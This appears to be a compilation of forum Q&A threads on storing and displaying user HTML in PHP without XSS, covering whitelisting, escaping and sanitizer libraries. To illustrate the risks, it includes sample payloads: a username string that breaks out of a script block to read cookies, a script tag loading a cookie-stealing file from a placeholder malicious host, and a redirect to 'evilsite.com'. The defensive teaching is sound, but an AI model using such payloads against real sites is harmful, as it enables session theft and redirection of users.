How to store user content while avoiding XSS vulnerabilities - php

I know similar questions have been asked, but I am struggling to work out how to do it.
I am building a CMS, rather primitive right now, but it's a learning exercise; on a production site I would certainly use an existing solution.
I would like to take user input, which can be styled in a WYSIWYG editor. I would also like users to be able to insert images inline.
I understand I can store HTML in the database, but how can I safely re-render it? I know there is no problem with the HTML being stored, but it is my understanding that XSS becomes an issue if I simply dump the user-generated code into a layout template.
So, put simply, the question is: how can I store and safely re-render user content in a CMS? I am using Laravel and PHP. I also have a little knowledge of JavaScript if it's required.

For a CMS where you want to allow some tags but not others, you want something like HTML Purifier. It takes HTML, runs it against a whitelist, and regenerates HTML that is safe to display back to the user.
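To make the whitelist idea concrete, here is a deliberately small sketch built on PHP's DOM extension. It illustrates the technique and is not a substitute for HTML Purifier: the allowed tags and attributes (ALLOWED_TAGS), the function names sanitizeHtml() and sanitizeChildren(), and the rule that links and images must use absolute http(s) URLs are all assumptions made for this example. It also ignores inline CSS and the many edge cases a maintained library handles.

```php
<?php
// Illustrative whitelist only (assumption): tag => allowed attributes.
const ALLOWED_TAGS = [
    'p' => [], 'br' => [], 'b' => [], 'i' => [], 'em' => [], 'strong' => [],
    'a' => ['href'], 'img' => ['src', 'alt'],
];
// Elements removed together with everything inside them.
const DROP_WITH_CONTENT = ['script', 'style', 'iframe', 'object', 'embed'];

function sanitizeChildren(DOMNode $parent): void
{
    // Copy the list first: removing nodes from a live list while iterating skips nodes.
    foreach (iterator_to_array($parent->childNodes, false) as $child) {
        if ($child instanceof DOMText) {
            continue; // text is re-escaped by saveHTML()
        }
        if (!($child instanceof DOMElement)) {
            $parent->removeChild($child); // comments, processing instructions, ...
            continue;
        }
        $tag = strtolower($child->tagName);
        if (in_array($tag, DROP_WITH_CONTENT, true)) {
            $parent->removeChild($child);
            continue;
        }
        sanitizeChildren($child);
        if (!array_key_exists($tag, ALLOWED_TAGS)) {
            // Unknown tag: keep its (already sanitized) children, drop the tag itself.
            while ($child->firstChild !== null) {
                $parent->insertBefore($child->firstChild, $child);
            }
            $parent->removeChild($child);
            continue;
        }
        foreach (iterator_to_array($child->attributes, false) as $attr) {
            $name = strtolower($attr->name);
            $allowed = in_array($name, ALLOWED_TAGS[$tag], true);
            // URLs must be absolute http(s); this rejects javascript:, data:, etc.
            if ($allowed && ($name === 'href' || $name === 'src')) {
                $allowed = preg_match('#^https?://#i', $attr->value) === 1;
            }
            if (!$allowed) {
                $child->removeAttribute($attr->name);
            }
        }
    }
}

function sanitizeHtml(string $html): string
{
    $doc = new DOMDocument();
    $previous = libxml_use_internal_errors(true); // silence warnings on messy markup
    // The meta tag tells libxml the input is UTF-8; the div is our wrapper.
    $doc->loadHTML('<meta http-equiv="Content-Type" content="text/html; charset=utf-8">'
        . '<div>' . $html . '</div>');
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $root = $doc->getElementsByTagName('div')->item(0); // first div = wrapper
    if ($root === null) {
        return '';
    }
    sanitizeChildren($root);

    $out = '';
    foreach ($root->childNodes as $node) {
        $out .= $doc->saveHTML($node);
    }
    return $out;
}
```

Unknown tags are unwrapped (their text is kept), while script, style and similar elements are dropped along with their contents. Text is serialized by saveHTML(), so a stray < in the text cannot turn back into markup.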

A good and cheap way to avoid cross-site scripting is to have your PHP program entitize everything in your users' input before storing it in the database. That is, you want to take this entry from a user:
Hi there sucker! I just hacked your site.
<script>alert('You have been pwned!')</script>
and convert it to this before putting it into your database.
Hi there sucker! I just hacked your site.
&lt;script&gt;alert('You have been pwned!')&lt;/script&gt;
When you pass &lt; to a browser, it renders it as <, but it doesn't do anything else with it.
The htmlentities() function can do this for you, and PHP's html_entity_decode() can reverse it if you need to. But you shouldn't reverse the operation unless you absolutely must, for example to load the document into an embedded editor for changes.
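Here is a minimal sketch of that round trip, using the malicious entry from this answer. The flags and the explicit 'UTF-8' charset are choices made for the example. ENT_QUOTES also encodes single and double quotes, which matters if the text ever ends up inside an HTML attribute.

```php
<?php
// The malicious entry from the example.
$input = "Hi there sucker! I just hacked your site.\n"
    . "<script>alert('You have been pwned!')</script>";

// Entitize: < > & " ' become &lt; &gt; &amp; &quot; &#039; (among others).
$stored = htmlentities($input, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
echo $stored, PHP_EOL;

// Reverse only when you really must, e.g. to load the text into an editor.
$restored = html_entity_decode($stored, ENT_QUOTES, 'UTF-8');
```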
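You can also choose to entitize user-furnished text after you retrieve it from your database and before you display it. If you get to the point where several people work on your code, you may want to do both for safety. In that case, pass false as the fourth ($double_encode) argument of htmlentities() or htmlspecialchars() so that text which is already encoded (&lt;) is not encoded a second time (&amp;lt;).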
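You can also render escaped user-provided input inside <pre>content</pre> tags, which tells the browser to keep its line breaks and spacing. Note that <pre> does not stop the browser from interpreting tags inside it, so the text still has to be escaped first.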

Related

OWASP Cross Site Scripting rules?

I'm reading about XSS to educate myself on security while working with PHP. I'm referring to this article, in which they talk about XSS and some of the rules that should be adhered to.
Could someone explain Rules #0 and #1 for me? I understand some of what they are saying, but when they say "untrusted data", do they mean data entered by the user?
I'm working on some forms and I'm trying to adhere to these rules to prevent XSS. The thing is, I never output anything to the user once the form is complete. All I do is process the data and save it to text files. I've done some client-side and a lot of server-side validation, but I can't figure out what they mean by "never insert untrusted data except in allowed locations".
By escaping do they mean closing tags - </>?
Rule #0 means that you should not output untrusted data in places on your web page where the browser expects to run instructions.
As shown in the article you linked, do not put user-generated data inside <script> tags. For example, this is a no-no:
<script>
var usernameSpanTag = document.getElementById('username');
usernameSpanTag.innerText = "Welcome back, "+<?=$username?>+"!";
</script>
Looks pretty safe, right? Well, what if your $username variable contains the following values:
""; console.log(document.cookie);//
So what your page will actually send to the browser is this:
<script>
var usernameSpanTag = document.getElementById('username');
usernameSpanTag.innerText = "Welcome back, "+""; console.log(document.cookie);//+"!";
</script>
So someone can easily steal your users' cookies and elevate their privileges. Now imagine that you're using similar code to, say, update which user created the latest post, shown via AJAX. That's a disaster waiting to happen if you do something like the above (and do not sanitize the username in the first place).
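The safest option, as the answer says, is to keep untrusted data out of <script> entirely. If you must put it there, the value has to be encoded as a JavaScript string literal rather than pasted in raw. One common PHP approach, shown here as a sketch, is json_encode() with the JSON_HEX_* flags. These turn quotes and < > & into \uXXXX escapes, so the value can neither close the string nor close the <script> element. The helper name jsStringLiteral() is hypothetical.

```php
<?php
// Encode a PHP string as a JavaScript string literal for an inline <script>.
// JSON_HEX_* turn < > & ' " into \uXXXX escapes, so the value cannot end
// the string literal or the </script> element.
function jsStringLiteral(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// The malicious username from the example.
$username = '""; console.log(document.cookie);//';

// json_encode() supplies the surrounding quotes itself, so don't add your own.
echo 'usernameSpanTag.innerText = "Welcome back, " + '
    . jsStringLiteral($username) . ' + "!";', PHP_EOL;
```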
The same applies to <style>, <img>, <embed>, <iframe> or any other tag that lets you run scripts or import resources. It also applies to comments. Browsers ignore comments, but some interpreters, like the JSP parser, handle HTML comments as template text and do not ignore their contents.
Rule #1 is pretty similar to rule #0. If you're developing web applications, at some point you will have to output user-generated data, whether it is an email address, a username, a name, or whatever.
If you're developing a forum, you may want to give your users some styling options for their text. Basic stuff like bold, underline and italics should suffice. If you want to get fancy, you may even let your users change the font.
An easy way to do it, without too many complications, is to let users write their own HTML if they choose to. But if you output that HTML unescaped, even in "safe" locations like between <p> tags, that's a disaster waiting to happen as well.
Because I can write:
Hey everybody, this is my first post <script src="//malicioussite.io/hackingYoCookiez.js"></script>!
If you don't escape that input, people will only see:
Hey everybody, this is my first post!
but their browsers will also load an external JavaScript file that tells them to send everybody's cookies to a remote location.
So always escape the data. If you're using PHP you can use htmlentities(), or use a template engine like Twig, which automatically escapes the output for you.

PHP - Plugin or library for whitelisting certain HTML tags

I am running a blog which other visitors can post on. I want to allow certain HTML tags like headers, linebreaks or links. What is a good or best piece of plugin software I can use for this?
Additionally, is it best practice to save the raw data and then whitelist it when it is time to display it on the blog? Or should I whitelist the data before saving it to the database, so that it is saved clean?
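The built-in function strip_tags() already has whitelist functionality that works quite nicely. Be aware, though, that it does not remove attributes (such as onclick or style) from the tags you allow, so on its own it does not protect against XSS.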
As for storage, it's a judgment call, but I recommend storing everything in its raw state and encoding for display only. It's only a concern if you think you may accidentally forget to strip/encode on display.
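Here is a quick sketch of strip_tags() with a whitelist, using the headers, line breaks and links from the question. It also shows two limitations. First, attributes on allowed tags, such as onclick, are left untouched, which the PHP manual warns about. Second, the text inside a removed <script> element stays behind as plain text.

```php
<?php
// Whitelist headers, line breaks and links, as in the question.
$allowed = '<h1><h2><h3><br><a>';

$post = '<h2>Title</h2><a href="https://example.com" onclick="steal()">link</a>'
    . '<script>alert(1)</script>';

$clean = strip_tags($post, $allowed);
echo $clean, PHP_EOL;
// The <script> tags are gone, but "alert(1)" remains as plain text and the
// onclick attribute on the allowed <a> tag is kept unchanged.
```

Because of this, strip_tags() output still needs attribute filtering (or a library such as HTML Purifier) before it is safe to display.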

PHP databases - don't want to show javascript code

I have a problem with PHP and JavaScript/CSS.
I have a database table that holds descriptions of articles, and I want to echo those descriptions. Unfortunately many of them include JavaScript or CSS (followed by the article text), so when I use echo, it shows all of that code and then the text. Is there any way to hide the JavaScript/CSS part and show only the text? For example with str_replace and a regular expression? If so, can somebody show me how it should look?
Thanks for your help, and let me know if you need more info (code etc.).
Use HTMLPurifier: it will remove the scripts, CSS and any harmful content from your articles. Since it is a CPU-intensive operation, it's better to run each article through HTMLPurifier once before saving it in the database than to run it every time you show the article.
If you're trying to remove tags from a user's post, you can call strip_tags(). This will get rid of CSS links, script tags, etc., although the text between <script> and </script> is left behind as plain text. It will not get rid of the style attribute, but if you also strip div, span, p, etc., that won't matter: there will be no tag for it to reside on.
As others have stated, it is generally better to sanitize your input (data from the user, before it goes into the DB) than your output.
If you simply want to hide the JS and CSS from users, you can obfuscate the JavaScript from less-savvy users with Packer, using its Base62 encoding. The JS will still work but will look like gibberish. Be aware that more knowledgeable users can deobfuscate the code, so any critical security risks in the JS still exist. Don't assume any JS that accesses your databases directly will be safe; instead, remove database access from the JavaScript. If the JS only does fancy things like moving elements around the page, it's probably fine to just obfuscate it.
Only consider this if YOU have complete control over and awareness of all JS included with the articles. If this is something anonymous or otherwise not 120% trusted users can upload, you need to kill that functionality and use HTML Purifier to remove any JS they might add. It is not safe to output user-entered JS, for you or your users.
As for the CSS, I'm not sure why you want to hide it, and CSS can't be obfuscated quite like JS can: the styles will still be in plain English, and the best you can do is mangle the class/id names and whitespace. Outputting CSS that YOU generated isn't a real security risk, though, and even if people reverse-engineer it I wouldn't be too worried.
Again, if this is something anonymous or untrusted users can ADD to your site on their own, you don't want it at all, so remove the ability to upload CSS with an article using the HTML Purifier that Darhazer mentioned.
You can try the following regex to remove the script and css:
"<script[\d\D]*?>[\d\D]*?</script>"
"<style[\d\D]*?>[\d\D]*?</style>"
They can help, but they cannot remove every script, for example inline event handlers such as onclick="javascript:alert(1)".
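The two patterns above can be applied in one preg_replace() call, as in this sketch. The name stripScriptAndStyle() is hypothetical, and the i modifier is added so that <SCRIPT> is caught too. The assertions show why the answer says this cannot remove everything. The onclick handler survives, and because preg_replace() makes a single pass, a nested input such as <scr<script></script>ipt> reassembles into a working <script> tag.

```php
<?php
// The two patterns from the answer, applied in one preg_replace() call.
// '#' is the delimiter because the patterns contain '/';
// the i modifier also catches <SCRIPT> and <Style>.
function stripScriptAndStyle(string $html): string
{
    $patterns = [
        '#<script[\d\D]*?>[\d\D]*?</script>#i',
        '#<style[\d\D]*?>[\d\D]*?</style>#i',
    ];
    return preg_replace($patterns, '', $html) ?? $html;
}

echo stripScriptAndStyle(
    '<p onclick="alert(1)">Text</p><script>var a = 1;</script><style>p{color:red}</style>'
), PHP_EOL;
```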

Write links in a natural and optimized way using JavaScript and/or PHP

The admin users of a module I'm developing want a feature that automatically turns URLs they write in the textarea(s) into links.
For example, if they write:
Please visit our page http://page.com
They want http://page.com to be converted automatically into a link:
<a href="http://page.com">http://page.com</a>
I want to do this in the best possible way in terms of usability and performance.
I can't change the type of field (textarea), but I can make modifications with PHP and with JavaScript, which is always enabled (no frameworks).
The users frequently edit the fields, and the links only matter when they "publish" the forms, because the contents of those textarea(s) are then displayed inside an HTML table.
A textarea input could have more than one link.
I appreciate your opinions and points of view to resolve this common situation.
In my opinion, you should handle this situation:
using PHP,
after reading the textarea contents from DB where it was stored,
before sending the HTML output
I don't know the details of your application context and its users, but whenever you output user input as HTML, you must take care of security issues such as XSS attacks.
If $textarea_contents is the variable where the textarea contents are (read from the DB), I would apply the htmlspecialchars function first:
$output = htmlspecialchars( $textarea_contents );
After this, you can parse the output string or use a regular expression to transform the URLs into anchor elements. Your choice depends on the level of precision you want. A couple of options are:
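Following the order suggested above (escape first, then linkify), a minimal sketch might look like this. The function name linkify() and the URL pattern are assumptions, not taken from the linked libraries. Because the pattern runs on already-escaped text, a matched URL cannot contain raw <, > or quote characters, which is what keeps the generated href safe. One side effect is that & in a URL comes out as &amp;, which is still correct inside an HTML attribute.

```php
<?php
// Escape first, then turn http(s)/ftp URLs into links.
// The URL pattern is an illustrative assumption, not a complete URL grammar;
// its final character class keeps trailing punctuation such as "." or ","
// out of the link.
function linkify(string $text): string
{
    $escaped = htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    $pattern = '/\b(?:https?|ftp):\/\/[-A-Z0-9+&@#\/%?=~_|!:,.;]*[-A-Z0-9+&@#\/%=~_|]/i';

    // $m[0] comes from already-escaped text, so it contains no raw < > " or '.
    return preg_replace_callback(
        $pattern,
        fn(array $m): string => '<a href="' . $m[0] . '">' . $m[0] . '</a>',
        $escaped
    ) ?? $escaped;
}

echo linkify('Please visit our page http://page.com'), PHP_EOL;
```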
http://code.iamcal.com/php/lib_autolink/lib_autolink.phps
http://jmrware.com/articles/2010/linkifyurl/linkify.html
This is also recommended reading on the complex problem of linkifying strings (from the creator of the Stack Overflow website):
http://www.codinghorror.com/blog/2008/10/the-problem-with-urls.html
Good luck!
$code = preg_replace('/((https?|ftp):\/\/(?:[A-Z0-9-]+\.)+[A-Z]{2,6}([\/?].+)?)/i', '<a href="$1">$1</a>', $code);
(Regex Source)
This regex is better because it handles the parameters passed in the URL and stops where the URL ends, without swallowing spaces or the words that follow.
(https?|ftp)://([-A-Z0-9.]+)(/[-A-Z0-9+&@#/%=~_|!:,.;]*)?(\?[A-Z0-9+&@#/%=~_|!:,.;]*)?
Any other suggestions for handling this situation? Should I use JavaScript or PHP? Any ideas?

Is it ok not to clean user input in this situation (PHP/MySQL)?

I always run user-supplied input through both the htmlentities() and mysql_real_escape_string() functions.
But now I am building a CMS which has a WYSIWYG editor in the admin section. I noticed that using htmlentities() on the WYSIWYG-edited content removes all styles and throws a bunch of quotes onto the front-end article page (as can be expected).
So is it OK not to clean the HTML/JavaScript entered by the user in this situation? I will still use mysql_real_escape_string(), which doesn't conflict.
Although the admin is the only one who has access to the back end, I can think of at least one scenario: suppose a hacker somehow got access to the create-post page. They could wreak havoc by deleting posts, etc., but instead they choose to use it as an opportunity to send visitors to their own site by making this post:
<script>window.location = "http://evilsite.com"</script>
So what should I do? Also, are there any functions that will disable JavaScript but keep HTML and inline CSS?
The WYSIWYG editor is TinyMCE, by the way.
It is never OK to not clean user input. Anybody can sabotage your system, just like you hypothesized. This kind of risk is simply not worth taking.
That said, in your case it depends on the WYSIWYG editor you use. Look through TinyMCE's documentation or ask around, and see what it says about XSS when displaying/rendering the HTML output of its rich text editor.
